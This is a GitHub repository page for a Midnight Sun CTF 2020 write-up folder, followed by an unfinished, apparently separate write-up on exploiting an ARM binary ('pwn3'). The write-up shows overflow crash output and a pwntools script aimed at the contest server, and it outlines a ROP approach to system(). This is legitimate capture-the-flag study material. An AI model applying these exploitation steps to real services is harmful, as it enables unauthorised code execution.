<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%202","user_id":null}}" data-hydro-click-hmac="79d383591adb00170bf43040c94f3cc7e5567d2561d811e7fcb1ff2318ba6611"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Midnight Sun CTF 2020 Quals</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwny racing 2<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Midnight Sun CTF 2020 Quals</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwny racing 2<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%202" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%202"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Pwn3 - Simple ARM pwnThis challenge comes with the binary [pwn3](https://github.com/henriknero/writeups/tree/master/pwn3/pwn3)``` $ file pwn3 pwn3: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=46d0723fb9ff9add7b00860a2382f32656a04700, stripped```When running the binary it firstly complains that we haven't supplied the file banner.txt, so we create this. Running it again we get the following:```$ ./pwn3bannertextbuffer: ```So we can input to a char-buff via stdin. So anyway I just started blasting``` $ python -c "print('a'*0x200)" | ./pwn3 buffertextbuffer: qemu: uncaught target signal 11 (Segmentation fault) - core dumpedSegmentation fault (core dumped)```Okey so, pwnlib...```pwn template --host pwn3-01.play.midnightsunctf.se --port 10003 pwn3 > exploit``````python...io = start()array = cyclic(0x200)io.sendline(array)
io.interactive()
```
So we have can overwrite the pc with the bufferoverflow, neat. We also see that we have space for some ropping looking at the stack-pointer. Now we just need to find a good gadget. We likely want to find system.
Conveniently the author uses ```system(cat banner.txt)``` to print the banner. But if this is not the case we can probably search for /bin/sh to locate the function anyways.
